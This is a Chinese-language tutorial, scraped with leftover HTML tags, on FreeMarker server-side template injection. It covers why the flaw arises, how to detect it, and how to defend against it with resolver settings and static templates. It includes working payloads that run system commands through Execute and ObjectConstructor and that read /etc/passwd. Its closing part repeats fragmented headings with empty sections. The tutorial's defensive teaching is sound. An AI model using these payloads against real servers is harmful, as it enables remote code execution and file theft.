FreeMarker模板注入漏洞分析与防御<\/h1>

一、FreeMarker简介<\/h2>
FreeMarker是一款基于Java的模板引擎，主要用于MVC模式的Web开发中生成动态HTML页面。它通过将模板与数据模型结合来生成输出文本。<\/p>

二、FreeMarker模板注入原理<\/h2>
FreeMarker模板注入(FreeMarker Template Injection, FTI)是一种服务器端模板注入(SSTI)漏洞，当攻击者能够控制模板内容或模板中的表达式时，可以执行任意代码。<\/p>

注入点产生原因<\/h3>

直接使用用户输入作为模板内容<\/li>
用户输入被拼接进模板表达式<\/li>

不安全的配置导致内置危险方法可被调用<\/li> <\/ol>

三、漏洞利用方式<\/h2>

基本注入语法<\/h3>

<<\/span>#<\/span>assign ex=<\/span>"freemarker.template.utility.Execute"<\/span>?<\/span>new<\/span>()><\/span> ${<\/span> ex(<\/span>"whoami"<\/span>)<\/span> }<\/span>
<\/span><\/span><\/code><\/pre>常用危险类和方法<\/h3>

freemarker.template.utility.Execute<\/code> - 执行系统命令<\/li>
freemarker.template.utility.ObjectConstructor<\/code> - 构造任意对象<\/li>
freemarker.template.utility.JythonRuntime<\/code> - 执行Python代码<\/li>
<\/ol>
实际利用示例<\/h3>
\/\/ 执行系统命令
<\/span><\/span><\/span><\/span><<\/span>#<\/span>assign ex=<\/span>"freemarker.template.utility.Execute"<\/span>?<\/span>new<\/span>()><\/span> ${<\/span> ex(<\/span>"id"<\/span>)<\/span> }<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 创建任意对象
<\/span><\/span><\/span><\/span><<\/span>#<\/span>assign ob=<\/span>"freemarker.template.utility.ObjectConstructor"<\/span>?<\/span>new<\/span>()><\/span> 
<\/span><\/span>${<\/span> ob(<\/span>"java.lang.ProcessBuilder"<\/span>,<\/span>"calc"<\/span>).<\/span>start<\/span>()<\/span> }<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 读取文件内容
<\/span><\/span><\/span><\/span><<\/span>#<\/span>assign f=<\/span>"freemarker.template.utility.ObjectConstructor"<\/span>?<\/span>new<\/span>()><\/span> 
<\/span><\/span>${<\/span> f(<\/span>"java.io.File"<\/span>,<\/span>"\/etc\/passwd"<\/span>).<\/span>getText<\/span>()<\/span> }<\/span>
<\/span><\/span><\/code><\/pre>四、漏洞检测方法<\/h2>

基本检测：${7*7}<\/code> 观察是否返回49<\/li>
表达式检测：<#assign a="freemarker.template.utility.ObjectConstructor"?new()><\/code> 观察是否报错<\/li>
完整检测：尝试执行无害命令如whoami<\/code><\/li>
<\/ol>
五、防御措施<\/h2>
1. 输入验证与过滤<\/h3>

对用户输入进行严格过滤，特别是<#<\/code>、${<\/code>等模板语法标记<\/li>
使用白名单机制限制允许的字符<\/li>
<\/ul>
2. FreeMarker安全配置<\/h3>
\/\/ 禁用危险内置方法
<\/span><\/span><\/span><\/span>Configuration cfg =<\/span> new<\/span> Configuration();<\/span>
<\/span><\/span>cfg.<\/span>setNewBuiltinClassResolver<\/span>(<\/span>TemplateClassResolver.<\/span>SAFER_RESOLVER<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 或完全禁用所有内置方法
<\/span><\/span><\/span><\/span>cfg.<\/span>setNewBuiltinClassResolver<\/span>(<\/span>TemplateClassResolver.<\/span>NOOP_RESOLVER<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>3. 沙箱环境<\/h3>

使用FreeMarker的沙箱功能限制模板执行权限<\/li>
配置模板加载器为安全模式<\/li>
<\/ul>
4. 其他措施<\/h3>

避免将用户输入直接作为模板内容<\/li>
使用静态模板，动态内容仅作为数据传入<\/li>
定期更新FreeMarker版本，修复已知漏洞<\/li>
<\/ul>
六、实际案例分析<\/h2>
案例1：用户输入直接作为模板<\/h3>
String templateContent =<\/span> request.<\/span>getParameter<\/span>(<\/span>"template"<\/span>);<\/span>
<\/span><\/span>Template template =<\/span> new<\/span> Template(<\/span>"name"<\/span>,<\/span> new<\/span> StringReader(<\/span>templateContent),<\/span> cfg);<\/span>
<\/span><\/span><\/code><\/pre>漏洞原因<\/strong>：用户可完全控制模板内容，可插入任意FreeMarker代码。<\/p>
案例2：表达式注入<\/h3>
String username =<\/span> request.<\/span>getParameter<\/span>(<\/span>"username"<\/span>);<\/span>
<\/span><\/span>String template =<\/span> "Welcome ${"<\/span> +<\/span> username +<\/span> "}!"<\/span>;<\/span>
<\/span><\/span><\/code><\/pre>漏洞原因<\/strong>：用户输入被直接拼接进表达式，可闭合原有表达式插入恶意代码。<\/p>
七、FreeMarker安全开发最佳实践<\/h2>

始终使用预定义的静态模板<\/li>
将用户输入作为数据模型传递，而非模板内容<\/li>
启用FreeMarker的安全配置<\/li>
避免字符串拼接构建模板<\/li>
定期审计模板使用代码<\/li>
<\/ol>
八、参考资源<\/h2>

FreeMarker官方安全文档<\/li>
OWASP SSTI防御指南<\/li>
FreeMarker CVE漏洞列表<\/li>
<\/ol>
通过以上措施，可以显著降低FreeMarker模板注入的风险，确保应用安全。<\/p>

FreeMarker模板注入漏洞分析与防御<\/h1>

一、FreeMarker简介<\/h2> FreeMarker是一款基于Java的模板引擎，主要用于MVC模式的Web开发中生成动态HTML页面。它通过将模板与数据模型结合来生成输出文本。<\/p>

二、FreeMarker模板注入原理<\/h2> FreeMarker模板注入(FreeMarker Template Injection, FTI)是一种服务器端模板注入(SSTI)漏洞，当攻击者能够控制模板内容或模板中的表达式时，可以执行任意代码。<\/p>

三、漏洞利用方式<\/h2>

五、防御措施<\/h2>

六、实际案例分析<\/h2>

八、参考资源<\/h2> FreeMarker官方安全文档<\/li> OWASP SSTI防御指南<\/li> FreeMarker CVE漏洞列表<\/li> <\/ol> 通过以上措施，可以显著降低FreeMarker模板注入的风险，确保应用安全。<\/p>

一、FreeMarker简介<\/h2>
FreeMarker是一款基于Java的模板引擎，主要用于MVC模式的Web开发中生成动态HTML页面。它通过将模板与数据模型结合来生成输出文本。<\/p>

二、FreeMarker模板注入原理<\/h2>
FreeMarker模板注入(FreeMarker Template Injection, FTI)是一种服务器端模板注入(SSTI)漏洞，当攻击者能够控制模板内容或模板中的表达式时，可以执行任意代码。<\/p>

八、参考资源<\/h2>

FreeMarker官方安全文档<\/li>
OWASP SSTI防御指南<\/li>
FreeMarker CVE漏洞列表<\/li> <\/ol>
通过以上措施，可以显著降低FreeMarker模板注入的风险，确保应用安全。<\/p>